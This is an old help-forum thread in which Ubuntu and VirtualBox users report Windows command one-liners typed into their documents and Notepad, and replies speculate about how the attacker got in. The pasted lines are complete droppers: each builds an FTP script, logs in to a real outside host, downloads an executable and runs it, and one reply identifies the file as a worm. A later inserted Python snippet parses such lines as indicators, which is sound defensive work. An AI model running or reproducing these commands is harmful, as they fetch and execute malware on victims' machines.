asked 2012-09-04 22:58:58 +0200
This post is a wiki. Anyone with karma >750 is welcome to improve it.
I am on Ubuntu 12.04 and using LO 3.5.4
I woke up this morning to find this displayed on my PC in a LO Writer file:
2011-12 Governor 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned
cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned
cmd /c echo open countx6.servegame.com 21 >> ik &echo user nobody lampp >> ik &echo binary >> ik &echo get system32.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &system32.exe &exit echo Windows has been updated.
Parts of this kept appearing in strange places in documents I was working on yesterday... I recognise some of it.
It is obviously some kind of Windows virus and is interfering with LO...
a) where does it hide?
b) how can I eliminate it?
c) how can I ensure it does not get passed on to Windows users?
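A defender-side check for the pattern in the pasted text above: each one-liner assembles an FTP script with repeated "echo ... >> ik", drives ftp with "-s:ik", deletes the script and launches the fetched file. The Python below is added here and is not from the original thread; it pulls those indicators out of a captured command line (for example from process-creation logging) and ignores ordinary scripted ftp use. The sample lines are constructed, with placeholder host, credentials and file names in place of the real ones.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed samples modelled on the one-liners pasted in the question above;
# host, credentials and file names are placeholders, not the real values.
SAMPLE_LINES = [
    "cmd /c echo open ftp.example.invalid 21 >> ik &echo user ftpuser ftppass >> ik "
    "&echo binary >> ik &echo get www/payload.exe >> ik &echo bye >> ik "
    "&ftp -n -v -s:ik &del ik &payload.exe &exit echo You got owned",
    r"ftp -n -s:C:\scripts\nightly_upload.txt",  # legitimate scripted transfer
]

@dataclass
class FtpDropper:
    script: str                        # scratch file the FTP commands were echoed into
    host: Optional[str] = None         # server the script connects to
    port: int = 21
    user: Optional[str] = None         # login name (the password is deliberately not kept)
    remote_file: Optional[str] = None  # file fetched with 'get'
    executed: Optional[str] = None     # what is launched once the script file is deleted

def parse_ftp_dropper(cmdline: str) -> Optional[FtpDropper]:
    """Indicators of an echo-to-script FTP dropper, or None if the line is not one."""
    # Fingerprint: 'ftp ... -s:<file>' where <file> was assembled in the same
    # command line with 'echo <ftp command> >> <file>'.
    m = re.search(r"\bftp\b[^&]*?-s:(\S+)", cmdline, re.I)
    if not m:
        return None
    script = m.group(1)
    appended = re.findall(r"echo\s+(.*?)\s*>>\s*" + re.escape(script) + r"\b", cmdline, re.I)
    if not appended:  # plain scripted ftp use, not a dropper
        return None
    hit = FtpDropper(script)
    for entry in appended:
        parts = entry.split()
        verb = parts[0].lower() if parts else ""
        if verb == "open" and len(parts) > 1:
            hit.host = parts[1]
            hit.port = int(parts[2]) if len(parts) > 2 and parts[2].isdigit() else 21
        elif verb == "user" and len(parts) > 1:
            hit.user = parts[1]
        elif verb == "get" and len(parts) > 1:
            hit.remote_file = parts[1]
    # The script is deleted and the next command is the payload being launched.
    run = re.search(r"del\s+" + re.escape(script) + r"\s*&\s*([^\s&]+)", cmdline, re.I)
    if run:
        hit.executed = run.group(1)
    return hit
```

Running parse_ftp_dropper over each entry of SAMPLE_LINES flags only the first one, yielding the host, port, login name, fetched file and launched executable as searchable indicators.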
answered 2012-09-05 07:19:05 +0200
The domain seems to be alizametal.com.tr (Trinidad I think), calling a web search for root.exe... I think it might be possible to pass on the file if it were to embed itself as a macro in LO. I found the following sites helpful:
http://www.threatexpert.com/files/root.exe.html
http://www.processlibrary.com/directory/files/root/21574/#.UEbeooqPXTY
Now back to your original question: Windows executables don't run in Ubuntu Linux, unless there is something like Wine available. But as long as you're not @root or su, I think there is no issue. Did you log in to the Ubuntu forums for an answer there? They have a free web-based IRC where you can get lots of further input and experience.
I hope this helps
answered 2012-09-18 21:12:20 +0200
Dunbrokin: I woke up to almost the same thing today. I have an Ubuntu 12.04.1 fully updated Linux server (just updated yesterday) with the latest version of Virtualbox running Windows 7 (also fully updated). Windows 7 was running at the time.
Today, when I used remote desktop protocol to get on to my Windows 7 VM, I saw notepad was opened, with the following text:
cmd /c echo open countx6.servegame.com 21 >> ik &echo user nobody lampp >> ik &echo binary >> ik &echo get system32.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &system32.exe &exit echo Windows has been updated.
Needless to say, it scared the crap out of me. Who was on my system, and what were they trying to do? After inspecting everything, I realized that I had enabled the remote display in VirtualBox for my Windows 7 VM. VirtualBox does not use a password for the RDP service. I also noticed that the vino-server in Ubuntu had used UPnP to open port 5900 on my router. I figure this is how they got in.
I'm still not sure how Notepad was opened and if anyone was actually on my system or if it was just a script kiddie, but I turned off UPnP, disabled the remote desktop, and scanned the system for malware. Nothing was found.
Does anyone know how a remote attacker can open Notepad (or LibreOffice apparently) without being on the machine? I know a carefully crafted URL can accomplish the task, but how did our computers visit such a URL?
I was curious, so I ftp'd to countx6.servegame.com and downloaded system32.exe. Its signature from MS Security Essentials was Worm:Win32/Nayrabot.gen!A.
Scary stuff...
Last updated: Sep 18 '12